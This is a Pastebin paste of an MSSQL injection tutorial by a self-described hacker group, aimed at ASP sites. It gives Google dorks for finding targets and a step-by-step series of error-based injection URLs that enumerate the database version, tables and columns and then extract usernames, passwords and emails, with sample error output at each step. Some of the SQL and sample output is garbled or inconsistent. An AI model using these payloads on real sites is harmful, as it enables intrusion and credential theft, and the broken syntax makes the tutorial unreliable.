API tools faq
paste
Advertisement
jingobd

MSSQL INJECTION TUTORIAL

jingobd
Aug 22nd, 2011
145
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 18.54 KB | None | 0 0
raw download clone embed print report
  1. MSSQL Injection - Method Of Attack
  2.  
  3.  
  4.  
  5.  BANGLADESHI HACKER.
  6. Bangladesh Cyber Army
  7.  
  8.     MSSQL - injection, method of attack!
  9.     ###########################
  10. in this tutorial:
  11.     1.1 Introduction
  12.     1.2 How to ask Vulnerability page?
  13.     1.3 How to prove that the site of weakness?
  14.     1.4 How to find version / name of the DB?
  15.     1.5 How to discover the names table (table_name)?
  16.     1.6 How to discover the names of column (column_name)?
  17.     1.7 How to get data from tables that interest us (eg name, pass, email, etc.)?
  18.     1.8 Conclusion?
  19.  
  20.  
  21.     [1.1 Introduction]
  22.     ############
  23.  
  24.     This lesson will try to explain that you already know the different techniques, MSSQL-injection.
  25.     Who will have the opportunity to learn how this method is used as a favorite act to obtain information (name, password and login) or various other information through this technique.
  26.     MSSQL-injection, can be used for products that are created by well-known company Microsoft.
  27.     This type of injection, then deal with those sites that are coded in ASP / Aspks etc.
  28.  
  29.     There are several types of attacks in this way:
  30.  
  31.     * - Normal MSSQL SQL Injection attacks
  32.     * - MSSQL injection in Web services (SOAP injection)
  33.     * - Union with MSSQL injection attack
  34.     * - ODBC error attack the "Convert"
  35.     * - MSSQL Blind SQL Injection attacks, etc. ..
  36.  
  37.     For this will be used for writing this type of attack:
  38.  
  39.     "Attack of the ODBC error message" Convert "
  40.  
  41.  
  42.     [1.2 How to ask Vulnerability page? ]
  43.     ############################
  44.  
  45.     How to ask who Vulnerability page is easy. This can use Google services company giant.
  46.  
  47.     Let's open: Google
  48.  
  49.     I write, for example: inurl: "products". "ID"
  50.     inurl: "neus.asp" menu "
  51.     inurl: "content.asp" under "
  52.     inurl: "games.asp" ID "
  53.     ETC ....( I decided some examples, you can now use the logic, for better dorks)
  54.  
  55.     [1.3 How to prove that the site of weakness? ]
  56.     ##################################
  57.  
  58.     So we can understand very easily by adding the following ID page of high comma (,).
  59.     And in case that gives us the answer we found no error page means Vulnerability example:
  60.  
  61.     ++++++++++++++++++++++++++++++++++++++
  62.     / Microsoft Access ODBC driver /
  63.     ++++++++++++++++++++++++++++++++++++++
  64.     / Open quotation /
  65.     ++++++++++++++++++++++++++++++++++++++
  66.     / Microsoft Amos DB provider for Oracle /
  67.     ++++++++++++++++++++++++++++++++++++++
  68.     / Division by zero in /
  69.     ++++++++++++++++++++++++++++++++++++++
  70.  
  71.     These are some of the most common response is shown pages that are weaknesses in the MSSQL - injection.
  72.  
  73.     Should now act as an example here, and where to put high ( ').
  74.  
  75.  
  76.     For example:
  77.  
  78.     --------------------------------------
  79.     http://www.localhost.com/ / news.asp? id = 100 '
  80.     --------------------------------------
  81.  
  82.     Now we can say that the error is displayed:
  83.  
  84.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
  85.     Microsoft Amos DB Provider for SQL Server error '80040e14 '
  86.  
  87.     Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
  88.  
  89.     / MSN / shared / includes / main_rub.asp, Line 4
  90.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
  91.  
  92.     This page has weaknesses!
  93.  
  94.  
  95.     [1.4 How to find version 2.4 / DB name? ]
  96.     ############################
  97.  
  98.  
  99.     Let the example easier to understand:
  100.  
  101.     Version:
  102.  
  103.     -------------------------------------------------- ------------------
  104.     http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (@ @ version)) --
  105.     -------------------------------------------------- ------------------
  106.  
  107.  
  108.     And we have presented an example:
  109.  
  110.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++
  111.     Microsoft Amos DB Provider for SQL Server error '80040e07 '
  112.  
  113.     Conversion failed when converting nvarchar value 'MS SQL Server 2008 (SP1) - 10.0.2531.0 (64) 29. March 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Edition (64-bit), the operating systems Windows NT 6.0 <x64> (Build 6002: Service Pack 2) (SM), a data type Int.
  114.  
  115.     / MSN / shared / includes / main_rub.asp, Line 4
  116.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++
  117.  
  118.  
  119.  
  120.     Now go find DB_Name:
  121.  
  122.     -------------------------------------------------- -------------------
  123.     http://www.localhost.com/ /news.asp? id = 100 + or +1 = convert (int (DB_Name ()))--
  124.     -------------------------------------------------- -------------------
  125.  
  126.     eg.
  127.  
  128.  
  129.     ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++
  130.     Microsoft Amos DB Provider for SQL Server error '80040e07 '
  131.  
  132.     Conversion is not EVILZONE_CREW_DB when converting nvarchar value 'to data type int.
  133.  
  134.     / MSN / shared / includes / main_rub.asp, Line 4
  135.     ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++
  136.  
  137.     [1.5 How to discover the names table (table_name)]
  138.     ######################################
  139.  
  140.  
  141.     Because it is discovered, or simply to find the side of the table goes through this method.
  142.  
  143.     For example:
  144.  
  145.     -------------------------------------------------- -------------------------------------------------- --------------
  146.     http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from information_schema.tables)) --
  147.     -------------------------------------------------- -------------------------------------------------- --------------
  148.  
  149.  
  150.     And now there will be a mistake, such as:
  151.  
  152.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
  153.     Microsoft Amos DB Provider for SQL Server error '80040e07 '
  154.  
  155.     Conversion is when converting nvarchar value of users' data on the type Int.
  156.  
  157.     / MSN / shared / includes / main_rub.asp, Line 4
  158.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
  159.  
  160.  
  161.     That is, in this case the table (table_name) The first is the 'Users', now find the following table:
  162.  
  163.     For example:
  164.  
  165.     -------------------------------------------------- -------------------------------------------------- ------------------------------------------------
  166.     http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users')))--
  167.     -------------------------------------------------- -------------------------------------------------- ------------------------------------------------
  168.  
  169.  
  170.     And now an error message will appear the same and will give another table:
  171.  
  172.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
  173.     Microsoft Amos DB Provider for SQL Server error '80040e07 '
  174.  
  175.     Conversion is not news when converting nvarchar value 'to data type int.
  176.  
  177.     / MSN / shared / includes / main_rub.asp, Line 4
  178.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
  179.  
  180.     Another table in this case is 'news'
  181.  
  182.     Now to find the table (table_name) third goes like this:
  183.  
  184.     For example:
  185.  
  186.  
  187.     -------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------
  188.     http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users',' news')))--
  189.     -------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------
  190.  
  191.  
  192.     I appear to us the third table:
  193.  
  194.  
  195.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
  196.     Microsoft Amos DB Provider for SQL Server error '80040e07 '
  197.  
  198.     Conversion is when converting nvarchar value categories' of data type int.
  199.  
  200.     / MSN / shared / includes / main_rub.asp, Line 4
  201.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
  202.  
  203.  
  204.     Then the third table 'categories', and so on until you find all the tables.
  205.  
  206.     For example:
  207.  
  208.  
  209.     -------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
  210.     http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users', 'news', 'Categories'))) --
  211.     -------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
  212.  
  213.     [1.6 How to discover the names of column (column_name)]
  214.     ###########################################
  215.  
  216.     -If you want to column_name for users as' go:
  217.  
  218.     For example:
  219.  
  220.  
  221.     -------------------------------------------------- -------------------------------------------------- -----------------------------------------
  222.     http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users'))--
  223.     -------------------------------------------------- -------------------------------------------------- -----------------------------------------
  224.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
  225.     Microsoft Amos DB Provider for SQL Server error '80040e07 '
  226.  
  227.     Conversion failed when converting nvarchar value 'Name' to data type int.
  228.  
  229.     / MSN / shared / includes / main_rub.asp, Line 4
  230.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
  231.  
  232.     So colums name for the table (table_name) 'Users' the 'name'
  233.  
  234.     Now find the column (column_name) other at the same table 'Users':
  235.  
  236.     For example:
  237.  
  238.  
  239.     -------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
  240.     http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users' and column_name (' name')))--
  241.     -------------------------------------------------- -------------------------------------------------- -------------------------------------------------- --------------------------
  242.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
  243.     Microsoft Amos DB Provider for SQL Server error '80040e07 '
  244.  
  245.     Conversion is not a password when converting nvarchar value 'to data type int.
  246.  
  247.     / MSN / shared / includes / main_rub.asp, Line 4
  248.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
  249.  
  250.  
  251.     columnes name (column_name) the other is 'password', now go find a rotating column_name:
  252.  
  253.     For example:
  254.  
  255.     -------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
  256.     http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users' and column_name ( 'name', 'password'))) --
  257.     -------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
  258.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
  259.     Microsoft Amos DB Provider for SQL Server error '80040e07 '
  260.  
  261.     Conversion failed when converting nvarchar value 'emailaddress' to data type int.
  262.  
  263.     / MSN / shared / includes / main_rub.asp, Line 4
  264.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
  265.  
  266.     Therefore, the third Colum_name 'emailaddress' and so on and on until the end, to find all of the columns (column_name)!
  267.  
  268.  
  269.  
  270.     [1.7 How to get data that interest you (our user name, pass, email, etc.)]
  271.     ################################################## ###
  272.  
  273.  
  274.     To do so you do not have anything to ndyshe we mentioned before.
  275.     In this section, all that needs to be done is to table (table_name), and the names of column (column_name) in their earlier results found.
  276.  
  277.     In this section will be used:
  278.     Table_name = Users
  279.     Column_name = user name, password, emailaddress!
  280.  
  281.     Some have now replaced the example:
  282.  
  283.  
  284.     -------------------------------------------------- -----------------------------------------
  285.     http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 name from Users)) --
  286.     -------------------------------------------------- -----------------------------------------
  287.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
  288.     Microsoft Amos DB Provider for SQL Server error '80040e07 '
  289.  
  290.     Conversion is not an administrator when converting nvarchar value 'to data type int.
  291.  
  292.     / MSN / shared / includes / main_rub.asp, Line 4
  293.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
  294.  
  295.     user name : Administrator
  296.  
  297.     Replacing now the first column "Name" in the second column "password":
  298.  
  299.     For example:
  300.  
  301.  
  302.     -------------------------------------------------- -----------------------------------------
  303.     http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top password from the user 1)) --
  304.     -------------------------------------------------- -----------------------------------------
  305.  
  306.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
  307.     Microsoft Amos DB Provider for SQL Server error '80040e07 '
  308.  
  309.     Conversion failed when converting nvarchar value '123456 'to data type int.
  310.  
  311.     / MSN / shared / includes / main_rub.asp, Line 4
  312.     ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
  313.  
  314.  
  315.     password: administratorpassword123
  316.  
  317.     Now, instead of rotating columns works the same as above:
  318.  
  319.     For example:
  320.  
  321.  
  322.     -------------------------------------------------- ---------------------------------------------
  323.     http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 from users emailaddress)) --
  324.     -------------------------------------------------- ---------------------------------------------
  325.  
  326.     emailaddress: king.cyborg@yahoo.com
  327.  
  328.     Here then we have achieved some info on, and the name / pass and emailaddress page.
  329.  
  330.     user name: Administrator
  331.     password: administratorpassword123
  332.     emailaddress: [email]king.cyborg@yahoo.com/email]
  333.  
  334.     [ 1.8 Conclusion ]
  335.     ############
  336.  
  337.     ================================================== ===========================
  338.     www.localhost.com/news.asp?id=100'
  339.     --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  340.     http://www.localhost.com/news.asp?id...(@@version))--
  341.     --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  342.     http://www.localhost.com/news.asp?id...(db_name()))--
  343.     --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  344.     http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables))--
  345.     --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  346.     http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
  347.     --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  348.     http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members')))--
  349.     --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  350.     http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members' , 'categories')))--
  351.     --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  352.     http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users'))--
  353.     --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  354.     http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))--
  355.     --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  356.     http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username' , 'password')))--
  357.     --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  358.     http://www.localhost.com/news.asp?id...rt(int,(select top 1 username from Users))--
  359.     --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  360.     http://www.localhost.com/news.asp?id...rt(int,(select top 1 password from Users))--
  361.     --------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  362.     http://www.localhost.com/news.asp?id...rt(int,(select top 1 emailaddress from Users))--
  363.     ================================================== ==========================
  364. www.bdcyberarmy.com
  365. www.facebook.com/groups/bdcyberarmy
  366. _____________________
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!